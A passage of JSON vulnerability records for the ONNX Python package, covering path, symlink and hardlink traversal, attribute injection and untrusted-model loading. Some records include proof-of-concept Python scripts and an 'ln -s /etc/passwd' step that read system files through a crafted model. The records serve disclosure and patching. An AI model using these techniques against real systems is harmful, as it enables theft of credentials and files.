canonicalization","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-04-01T23:40:58.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.1,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H","references":["https://github.com/onnx/onnx/security/advisories/GHSA-q56x-g2fj-4rj6","https://github.com/advisories/GHSA-q56x-g2fj-4rj6"],"source_kind":"github","identifiers":["GHSA-q56x-g2fj-4rj6"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-02T00:00:09.167Z","updated_at":"2026-06-16T12:01:31.360Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xNTZ4LWcyZmotNHJqNs4ABUmQ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xNTZ4LWcyZmotNHJqNs4ABUmQ","packages":[{"ecosystem":"pypi","package_name":"onnx","versions":[{"first_patched_version":"1.21.0","vulnerable_version_range":"\u003c= 1.20.1"}],"purl":"pkg:pypi/onnx"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xNTZ4LWcyZmotNHJqNs4ABUmQ/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wNDMzLTl3djgtMjh4as4ABUk9","url":"https://github.com/advisories/GHSA-p433-9wv8-28xj","title":"ONNX: External Data Symlink Traversal","description":"Summary\n- Issue: Symlink traversal in external data loading allows reading files outside the model directory.\n- Affected code: `onnx/onnx/checker.cc: resolve_external_data_location` used via Python `onnx.external_data_helper.load_external_data_for_model`.\n- Impact: Arbitrary file read (confidentiality breach) when a model’s external data path resolves to a symlink targeting a file outside the model directory.\n\nRoot Cause\n- The function `resolve_external_data_location(base_dir, location, tensor_name)` intends to ensure that external data files reside within `base_dir`. It:\n  - Rejects empty/absolute paths\n  - Normalizes the relative path and rejects `..`\n  - Builds `data_path = base_dir / relative_path`\n  - Checks `exists(data_path)` and `is_regular_file(data_path)`\n- However, `std::filesystem::is_regular_file(path)` follows symlinks to their targets. A symlink placed inside `base_dir` that points to a file outside `base_dir` will pass the checks and be returned. The Python loader then opens the path and reads the target file.\n\nCode Reference\n- File: onnx/onnx/checker.cc:970-1060\n- Key logic:\n  - Normalization: `auto relative_path = file_path.lexically_normal().make_preferred();`\n  - Existence: `std::filesystem::exists(data_path)`\n  - Regular file check: `std::filesystem::is_regular_file(data_path)`\n  - Returned path is later opened in Python: `external_data_helper.load_external_data_for_tensor`.\n\nProof of Concept (PoC)\n- File: `onnx_external_data_symlink_traversal_poc.py`\n- Behavior: Creates a model with an external tensor pointing to `tensor.bin`. In the model directory, creates `tensor.bin` as a symlink to `/etc/hosts` (or similar). Calls `load_external_data_for_model(model, base_dir)`. Confirms that `tensor.raw_data` contains content from the target outside the model directory.\n- Run:\n  - `python3 onnx_external_data_symlink_traversal_poc.py`\n  - Expected: `[!!!] VULNERABILITY CONFIRMED: external_data symlink escaped base_dir`\n\nonnx_external_data_symlink_traversal_poc.py\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nONNX External Data Symlink Traversal PoC\n\nFinding: load_external_data_for_model() (via c_checker._resolve_external_data_location)\ndoes not reject symlinks. A relative location that is a symlink inside the\nmodel directory can target a file outside the directory and will be read.\n\nImpact: Arbitrary file read outside model_dir when external data files are\nobtained from attacker-controlled archives (zip/tar) that create symlinks.\n\nThis PoC:\n - Creates a model with a tensor using external_data location 'tensor.bin'\n - Creates 'tensor.bin' as a symlink to a system file (e.g., /etc/hosts)\n - Calls load_external_data_for_model(model, base_dir)\n - Confirms that tensor.raw_data contains the content of the outside file\n\nSafe: only reads a benign system file if present.\n\"\"\"\n\nimport os\nimport sys\nimport tempfile\nimport pathlib\n\n# Ensure we import installed onnx, not the local cloned package\n_here = os.path.dirname(os.path.abspath(__file__))\nif _here in sys.path:\n    sys.path.remove(_here)\n\nimport onnx\nfrom onnx import helper, TensorProto\nfrom onnx.external_data_helper import (\n    set_external_data,\n    load_external_data_for_model,\n)\n\n\ndef pick_target_file():\n    candidates = [\"/etc/hosts\", \"/etc/passwd\", \"/System/Library/CoreServices/SystemVersion.plist\"]\n    for p in candidates:\n        if os.path.exists(p) and os.path.isfile(p):\n            return p\n    raise RuntimeError(\"No suitable readable system file found for this PoC\")\n\n\ndef build_model_with_external(location: str):\n    # A 1D tensor; data will be filled from external file\n    tensor = helper.make_tensor(\n        name=\"X_ext\",\n        data_type=TensorProto.UINT8,\n        dims=[0],  # dims will be inferred after raw_data is read\n        vals=[],\n    )\n    # add dummy raw_data then set_external_data to mark as external\n    tensor.raw_data = b\"dummy\"\n    set_external_data(tensor, location=location)\n\n    # Minimal graph that just feeds the initializer as Constant\n    const_node = helper.make_node(\"Constant\", inputs=[], outputs=[\"out\"], value=tensor)\n    graph = helper.make_graph([const_node], \"g\", inputs=[], outputs=[helper.make_tensor_value_info(\"out\", TensorProto.UINT8, None)])\n    model = helper.make_model(graph)\n    return model\n\n\ndef main():\n    base = tempfile.mkdtemp(prefix=\"onnx_symlink_poc_\")\n    model_dir = base\n    link_name = os.path.join(model_dir, \"tensor.bin\")\n\n    target = pick_target_file()\n    print(f\"[*] Using target file: {target}\")\n\n    # Create symlink in model_dir pointing outside\n    try:\n        pathlib.Path(link_name).symlink_to(target)\n    except OSError as e:\n        print(f\"[!] Failed to create symlink: {e}\")\n        print(\"    This PoC needs symlink capability.\")\n        return 1\n\n    # Build model referencing the relative location 'tensor.bin'\n    model = build_model_with_external(location=\"tensor.bin\")\n\n    # Use in-memory model; explicitly load external data from base_dir\n    loaded = model\n    print(\"[*] Loading external data into in-memory model...\")\n    try:\n        load_external_data_for_model(loaded, base_dir=model_dir)\n    except Exception as e:\n        print(f\"[!] load_external_data_for_model raised: {e}\")\n        return 1\n\n    # Validate that raw_data came from outside file by checking a prefix\n    raw = None\n    # Search initializers\n    for t in loaded.graph.initializer:\n        if t.name == \"X_ext\" and t.HasField(\"raw_data\"):\n            raw = t.raw_data\n            break\n    # Search constant attributes if not found\n    if raw is None:\n        for node in loaded.graph.node:\n            for attr in node.attribute:\n                if attr.HasField(\"t\") and attr.t.name == \"X_ext\" and attr.t.HasField(\"raw_data\"):\n                    raw = attr.t.raw_data\n                    break\n            if raw is not None:\n                break\n    if raw is None:\n        print(\"[?] Did not find raw_data on tensor; PoC inconclusive\")\n        return 2\n\n    with open(target, \"rb\") as f:\n        target_prefix = f.read(32)\n    if raw.startswith(target_prefix):\n        print(\"[!!!] VULNERABILITY CONFIRMED: external_data symlink escaped base_dir\")\n        print(f\"      Symlink {link_name} -\u003e {target}\")\n        return 0\n    else:\n        print(\"[?] Raw data did not match target prefix; environment-specific behavior\")\n        return 3\n\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n\n```","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-04-01T21:14:00.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N","references":["https://github.com/onnx/onnx/security/advisories/GHSA-p433-9wv8-28xj","https://nvd.nist.gov/vuln/detail/CVE-2026-34447","https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2026-104.yaml","https://github.com/advisories/GHSA-p433-9wv8-28xj"],"source_kind":"github","identifiers":["GHSA-p433-9wv8-28xj","CVE-2026-34447"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-01T22:00:08.741Z","updated_at":"2026-06-21T07:01:40.561Z","epss_percentage":0.00248,"epss_percentile":0.15851,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wNDMzLTl3djgtMjh4as4ABUk9","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wNDMzLTl3djgtMjh4as4ABUk9","packages":[{"ecosystem":"pypi","package_name":"onnx","versions":[{"first_patched_version":"1.21.0","vulnerable_version_range":"\u003c 1.21.0"}],"purl":"pkg:pypi/onnx"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wNDMzLTl3djgtMjh4as4ABUk9/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jbXc2LWhjcHAtYzZqcM4ABUk8","url":"https://github.com/advisories/GHSA-cmw6-hcpp-c6jp","title":"ONNX: Arbitrary File Read via ExternalData Hardlink Bypass in ONNX load","description":"### Summary\nThe issue is in `onnx.load` — the code checks for symlinks to prevent path traversal, but completely misses hardlinks, which is the problem, since a hardlink looks exactly like a regular file on the filesystem.\n\n### The Real Problem\nThe validator in `onnx/checker.cc` only calls `is_symlink()` and never checks the inode or `st_nlink`, so a hardlink walks right through every security check without any issues.\n\n### Impact\nEspecially dangerous in AI supply chain scenarios like HuggingFace — a single malicious model is enough to silently steal secrets from the victim's machine without them noticing anything.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-04-01T21:13:37.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.7,"cvss_vector":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N","references":["https://github.com/onnx/onnx/security/advisories/GHSA-cmw6-hcpp-c6jp","https://nvd.nist.gov/vuln/detail/CVE-2026-34446","https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb","https://github.com/advisories/GHSA-cmw6-hcpp-c6jp"],"source_kind":"github","identifiers":["GHSA-cmw6-hcpp-c6jp","CVE-2026-34446"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-01T22:00:08.741Z","updated_at":"2026-06-21T07:01:40.561Z","epss_percentage":0.00176,"epss_percentile":0.07276,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jbXc2LWhjcHAtYzZqcM4ABUk8","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jbXc2LWhjcHAtYzZqcM4ABUk8","packages":[{"ecosystem":"pypi","package_name":"onnx","versions":[{"first_patched_version":"1.21.0","vulnerable_version_range":"\u003c= 1.20.1"}],"purl":"pkg:pypi/onnx"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jbXc2LWhjcHAtYzZqcM4ABUk8/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01MzhjLTU1anYtYzVnOc4ABUk2","url":"https://github.com/advisories/GHSA-538c-55jv-c5g9","title":"ONNX: Malicious ONNX models can crash servers by exploiting unprotected object settings.","description":"### Summary\nThe ExternalDataInfo class in ONNX was using Python’s setattr() function to load metadata (like file paths or data lengths) directly from an ONNX model file. The problem? It didn’t check if the \"keys\" in the file were valid. Because it blindly trusted the file, an attacker could craft a malicious model that overwrites internal object properties.\n\n### Why its Dangerous\n**Instant Crash DoS**: An attacker can set the length property to a massive number like 9 petabytes. When the system tries to load the model, it attempts to allocate all that RAM at once, causing the server to crash or freeze Out of Memory.\n\n**Access Bypass**: By setting a negative offset -1, an attacker can trick the system into reading parts of a file it wasn't supposed to touch.\n\n**Object Corruption**: Attackers can even inject \"dunder\" attributes like __class__ to change the object's type entirely, which could lead to more complex exploits.\n\n**Fixed**: https://github.com/onnx/onnx/pull/7751 object state corruption and DoS via ExternalDataInfo attribute injection","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-04-01T21:10:52.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H","references":["https://github.com/onnx/onnx/security/advisories/GHSA-538c-55jv-c5g9","https://nvd.nist.gov/vuln/detail/CVE-2026-34445","https://github.com/onnx/onnx/pull/7751","https://github.com/onnx/onnx/commit/e30c6935d67cc3eca2fa284e37248e7c0036c46b","https://github.com/advisories/GHSA-538c-55jv-c5g9"],"source_kind":"github","identifiers":["GHSA-538c-55jv-c5g9","CVE-2026-34445"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-01T22:00:08.743Z","updated_at":"2026-06-21T07:01:42.050Z","epss_percentage":0.00288,"epss_percentile":0.2026,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01MzhjLTU1anYtYzVnOc4ABUk2","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01MzhjLTU1anYtYzVnOc4ABUk2","packages":[{"ecosystem":"pypi","package_name":"onnx","versions":[{"first_patched_version":"1.21.0","vulnerable_version_range":"\u003c= 1.20.1"}],"purl":"pkg:pypi/onnx"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01MzhjLTU1anYtYzVnOc4ABUk2/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS0zcjl4LWYyM2otZ2M3M84ABUgv","url":"https://github.com/advisories/GHSA-3r9x-f23j-gc73","title":"onnx Vulnerable to Path Traversal via Symlink","description":"### Summary\nA path traversal vulnerability via symlink allows to read arbitrary files outside model or user-provided directory. \n\n### Details\nThe following check for symlink is ineffective and it is possible to point a symlink to an arbitrary location on the file system:\nhttps://github.com/onnx/onnx/blob/336652a4b2ab1e530ae02269efa7038082cef250/onnx/checker.cc#L1024-L1033\n\n`std::filesystem::is_regular_file` performs a `status(p)` call on the provided path, which follows symbolic links to determine the file type, meaning it will return true if the target of a symlink is a regular file. \n\n\n### PoC\n\n\n\n```python\n# Create a demo model with external data\nimport os\nimport numpy as np\nimport onnx\nfrom onnx import helper, TensorProto, numpy_helper\n\ndef create_onnx_model(output_path=\"model.onnx\"):\n    weight_matrix = np.random.randn(1000, 1000).astype(np.float32)\n\n    X = helper.make_tensor_value_info(\"X\", TensorProto.FLOAT, [1, 1000])\n    Y = helper.make_tensor_value_info(\"Y\", TensorProto.FLOAT, [1, 1000])\n    W = numpy_helper.from_array(weight_matrix, name=\"W\")\n\n    matmul_node = helper.make_node(\"MatMul\", inputs=[\"X\", \"W\"], outputs=[\"Y\"], name=\"matmul\")\n\n    graph = helper.make_graph(\n        nodes=[matmul_node],\n        name=\"SimpleModel\",\n        inputs=[X],\n        outputs=[Y],\n        initializer=[W]\n    )\n\n    model = helper.make_model(graph, opset_imports=[helper.make_opsetid(\"\", 11)])\n    onnx.checker.check_model(model)\n\n    data_file = output_path.replace('.onnx', '.data')\n\n    if os.path.exists(output_path):\n        os.remove(output_path)\n    if os.path.exists(data_file):\n        os.remove(data_file)\n\n    onnx.save_model(\n        model,\n        output_path,\n        save_as_external_data=True,\n        all_tensors_to_one_file=True,\n        location=os.path.basename(data_file),\n        size_threshold=1024 * 1024\n    )\n\nif __name__ == \"__main__\":\n    create_onnx_model(\"model.onnx\")\n```\n\n1. Run the above code to generate a sample model with external data.\n2. Remove `model.data`\n3. Run `ln -s /etc/passwd model.data`\n4. Load the model using the following code\n5. Observe check for symlink is bypassed and model is succesfuly loaded\n\n```python\nimport onnx\nfrom onnx.external_data_helper import load_external_data_for_model\n\ndef load_onnx_model_basic(model_path=\"model.onnx\"):\n    model = onnx.load(model_path)\n    return model\n\ndef load_onnx_model_explicit(model_path=\"model.onnx\"):\n    model = onnx.load(model_path, load_external_data=False)\n    load_external_data_for_model(model, \".\")\n    return model\n\nif __name__ == \"__main__\":\n    model = load_onnx_model_basic(\"model.onnx\")\n\n```\n\nA common misuse case for successful exploitation is that an adversary can provide victim with a compressed file, containing `poc.onnx` and `poc.data (symlink)`. Once the victim uncompress and load the model, symlink read the adversary selected arbitrary file.\n\n\n### Impact\n\nRead sensitive and arbitrary files and environment variable (e.g. /proc/1/environ) from the host that loads the model.\n\nNOTE: this issue is not limited to UNIX.\n\n### Sample patch\n\n```c\n#include \u003cfcntl.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\nint open_external_file_no_symlink(const char *base_dir,\n                                  const char *relative_path) {\n    int dirfd = -1;\n    int fd = -1;\n    struct stat st;\n\n    // Open base directory\n    dirfd = open(base_dir, O_RDONLY | O_DIRECTORY);\n    if (dirfd \u003c 0) {\n        return -1;\n    }\n\n    // Open the target relative to base_dir\n    // O_NOFOLLOW =\u003e fail if final path component is a symlink\n    fd = openat(dirfd,\n                relative_path,\n                O_RDONLY | O_NOFOLLOW);\n    close(dirfd);\n\n    if (fd \u003c 0) {\n        // ELOOP is the typical error if a symlink is encountered\n        return -1;\n    }\n\n    // Inspect the *opened file*\n    if (fstat(fd, \u0026st) != 0) {\n        close(fd);\n        return -1;\n    }\n\n    // Enforce \"regular file only\"\n    if (!S_ISREG(st.st_mode)) {\n        close(fd);\n        errno = EINVAL;\n        return -1;\n    }\n\n    // fd is now:\n    // - not a symlink\n    // - not a directory\n    // - not a device / FIFO / socket\n    // - race-safe\n    return fd;\n}\n```\n\n### Resources\n\n* https://cwe.mitre.org/data/definitions/61.html\n* https://discuss.secdim.com/t/input-validation-necessary-but-not-sufficient-it-doesnt-target-the-fundamental-issue/1172\n* https://discuss.secdim.com/t/common-pitfalls-for-patching-path-traversal/3368","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-31T22:34:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N","references":["https://github.com/onnx/onnx/security/advisories/GHSA-3r9x-f23j-gc73","https://nvd.nist.gov/vuln/detail/CVE-2026-27489","https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb","https://github.com/advisories/GHSA-3r9x-f23j-gc73"],"source_kind":"github","identifiers":["GHSA-3r9x-f23j-gc73","CVE-2026-27489"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-31T23:00:08.742Z","updated_at":"2026-06-21T07:01:43.746Z","epss_percentage":0.00522,"epss_percentile":0.40094,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zcjl4LWYyM2otZ2M3M84ABUgv","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0zcjl4LWYyM2otZ2M3M84ABUgv","packages":[{"ecosystem":"pypi","package_name":"onnx","versions":[{"first_patched_version":"1.21.0","vulnerable_version_range":"\u003c= 1.20.0"}],"purl":"pkg:pypi/onnx"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zcjl4LWYyM2otZ2M3M84ABUgv/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ocW1qLWg1YzYtMzY5bc4ABTt-","url":"https://github.com/advisories/GHSA-hqmj-h5c6-369m","title":"ONNX Untrusted Model Repository Warnings Suppressed by silent=True in onnx.hub.load() — Silent Supply-Chain Attack","description":"## What's the issue\nPassing `silent=True` to `onnx.hub.load()` kills all trust warnings and user prompts. This means a model can be downloaded from any unverified GitHub repo with zero user awareness.\n \n```python\nif not _verify_repo_ref(repo) and not silent:\n    # completely skipped when silent=True\n    print(\"The model repo... is not trusted\")\n    if input().lower() != \"y\":\n        return None\n```\n \nOn top of that, the SHA256 integrity check is useless here — it validates against a manifest that lives in the same repo the attacker controls, so the hash will always match.\n\n \n## Impact\nAny pipeline using `hub.load()` with `silent=True` and an external repo string is silently loading whatever the repo owner ships. If that model executes arbitrary code on load, the attacker has access to the machine.\n \n## Resolved by removing the feature \n## References\n \n- [Write-up](https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-28500.md)","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-03-16T16:23:28.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N","references":["https://github.com/onnx/onnx/security/advisories/GHSA-hqmj-h5c6-369m","https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-28500.md","https://nvd.nist.gov/vuln/detail/CVE-2026-28500","https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2026-103.yaml","https://github.com/advisories/GHSA-hqmj-h5c6-369m"],"source_kind":"github","identifiers":["GHSA-hqmj-h5c6-369m","CVE-2026-28500"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-16T17:00:09.540Z","updated_at":"2026-06-21T07:00:26.134Z","epss_percentage":0.00256,"epss_percentile":0.16781,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ocW1qLWg1YzYtMzY5bc4ABTt-","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ocW1qLWg1YzYtMzY5bc4ABTt-","packages":[{"ecosystem":"pypi","package_name":"onnx","versions":[{"first_patched_version":"1.21.0rc1","vulnerable_version_range":"\u003c= 1.20.1"}],"purl":"pkg:pypi/onnx"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ocW1qLWg1YzYtMzY5bc4ABTt-/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oMzZqLTh2djMtY2o1Ms4ABFt2","url":"https://github.com/advisories/GHSA-h36j-8vv3-cj52","title":"Open Neural Network Exchange (ONNX) Path Traversal Vulnerability","description":"A vulnerability in the `download_model` function of the onnx/onnx framework, before and including version 1.16.1, allows for arbitrary file overwrite due to inadequate prevention of path traversal attacks in malicious tar files. This vulnerability can be exploited by an attacker to overwrite files in the user's directory, potentially leading to remote command execution.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-03-20T12:32:46.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-7776","https://huntr.com/bounties/a7a46cf6-1fa0-454b-988c-62d222e83f63","https://github.com/onnx/onnx/pull/6222","https://github.com/onnx/onnx/commit/1b70f9b673259360b6a2339c4bd97db9ea6e552f","https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2025-10.yaml","https://github.com/advisories/GHSA-h36j-8vv3-cj52"],"source_kind":"github","identifiers":["GHSA-h36j-8vv3-cj52","CVE-2024-7776"],"repository_url":"https://github.com/onnx/onnx","blast_radius":0.0,"created_at":"2025-03-21T22:08:09.465Z","updated_at":"2026-06-21T07:04:13.717Z","epss_percentage":0.01274,"epss_percentile":0.66107,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oMzZqLTh2djMtY2o1Ms4ABFt2","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oMzZqLTh2djMtY2o1Ms4ABFt2","packages":[{"ecosystem":"pypi","package_name":"onnx","versions":[{"first_patched_version":"1.17.0","vulnerable_version_range":"\u003c 1.17.0"}],"purl":"pkg:pypi/onnx"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oMzZqLTh2djMtY2o1Ms4ABFt2/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS02cnE5LTUzYzMtZjd2as4AA8xR","url":"https://github.com/advisories/GHSA-6rq9-53c3-f7vj","title":"onnx allows Arbitrary File Overwrite in download_model_with_test_data","description":"A vulnerability in the `download_model_with_test_data` function of the onnx/onnx framework, versions before 1.16.2, allow for arbitrary file overwrite due to inadequate prevention of path traversal attacks in malicious tar files. This vulnerability enables attackers to overwrite any file on the system, potentially leading to remote code execution, deletion of system, personal, or application files, thus impacting the integrity and availability of the system. The issue arises from the function's handling of tar file extraction without performing security checks on the paths within the tar file, as demonstrated by the ability to overwrite the `/home/kali/.ssh/authorized_keys` file by specifying an absolute path in the malicious tar file.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-06-06T21:30:37.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-5187","https://huntr.com/bounties/50235ebd-3410-4ada-b064-1a648e11237e","https://github.com/onnx/onnx/issues/6215","https://github.com/onnx/onnx/pull/6145","https://github.com/onnx/onnx/commit/1b70f9b673259360b6a2339c4bd97db9ea6e552f","https://github.com/onnx/onnx/commit/3fc3845edb048df559aa2a839e39e95503a0ee34","https://github.com/onnx/onnx/pull/6222","https://github.com/onnx/onnx/releases/tag/v1.16.2","https://github.com/onnx/onnx/pull/6959","https://github.com/onnx/onnx/pull/7040","https://github.com/advisories/GHSA-6rq9-53c3-f7vj","https://github.com/onnx/onnx","https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2025-148.yaml","https://www.gecko.security/blog/cve-2025-51480"],"source_kind":"github","identifiers":["GHSA-6rq9-53c3-f7vj","CVE-2024-5187"],"repository_url":"https://github.com/onnx/onnx","blast_radius":0.0,"created_at":"2024-10-23T18:06:26.579Z","updated_at":"2026-06-21T07:04:31.653Z","epss_percentage":0.01178,"epss_percentile":0.63574,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02cnE5LTUzYzMtZjd2as4AA8xR","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02cnE5LTUzYzMtZjd2as4AA8xR","packages":[{"ecosystem":"pypi","package_name":"onnx","versions":[{"first_patched_version":"1.16.2","vulnerable_version_range":"\u003c 1.16.2"}],"purl":"pkg:pypi/onnx"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02cnE5LTUzYzMtZjd2as4AA8xR/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oOHd2LTloOTYtbTRocs4AA5eq","url":"https://github.com/advisories/GHSA-h8wv-9h96-m4hr","title":"Onnx Out-of-bounds Read vulnerability","description":"Versions of the package onnx before and including 1.15.0 are vulnerable to Out-of-bounds Read as the ONNX_ASSERT and ONNX_ASSERTM functions have an off by one string copy.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-02-23T18:30:59.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.4,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-27319","https://github.com/onnx/onnx/commit/08a399ba75a805b7813ab8936b91d0e274b08287","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL","https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-223.yaml","https://github.com/advisories/GHSA-h8wv-9h96-m4hr"],"source_kind":"github","identifiers":["GHSA-h8wv-9h96-m4hr","CVE-2024-27319"],"repository_url":"https://github.com/onnx/onnx","blast_radius":0.0,"created_at":"2024-03-03T06:04:35.320Z","updated_at":"2026-06-21T07:06:12.657Z","epss_percentage":0.00594,"epss_percentile":0.4371,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oOHd2LTloOTYtbTRocs4AA5eq","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oOHd2LTloOTYtbTRocs4AA5eq","packages":[{"ecosystem":"pypi","package_name":"onnx","versions":[{"first_patched_version":"1.16.0","vulnerable_version_range":"\u003c= 1.15.0"}],"purl":"pkg:pypi/onnx"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oOHd2LTloOTYtbTRocs4AA5eq/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS13aGg4LWZqZ2MtcXA3M84AA5ep","url":"https://github.com/advisories/GHSA-whh8-fjgc-qp73","title":"Onnx Directory Traversal vulnerability","description":"Versions of the package onnx before and including 1.15.0 are vulnerable to Directory Traversal as the external_data field of the tensor proto can have a path to the file which is outside the model current directory or user-provided directory. The vulnerability occurs as a bypass for the patch added for CVE-2022-25882.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-02-23T18:30:59.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-27318","https://github.com/onnx/onnx/commit/66b7fb630903fdcf3e83b6b6d56d82e904264a20","https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FGTBH5ZYL2LGYHIJDHN2MAUURIR5E7PY","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFJJID2IZDOLFDMWVYTBDI75ZJQC6JOL","https://github.com/pypa/advisory-database/tree/main/vulns/onnx/PYSEC-2024-222.yaml","https://github.com/advisories/GHSA-whh8-fjgc-qp73"],"source_kind":"github","identifiers":["GHSA-whh8-fjgc-qp73","CVE-2024-27318"],"repository_url":"https://github.com/onnx/onnx","blast_radius":0.0,"created_at":"2024-02-23T21:05:04.346Z","updated_at":"2026-06-21T07:06:12.657Z","epss_percentage":0.01189,"epss_percentile":0.63879,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13aGg4LWZqZ2MtcXA3M84AA5ep","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13aGg4LWZqZ2MtcXA3M84AA5ep","packages":[{"ecosystem":"pyp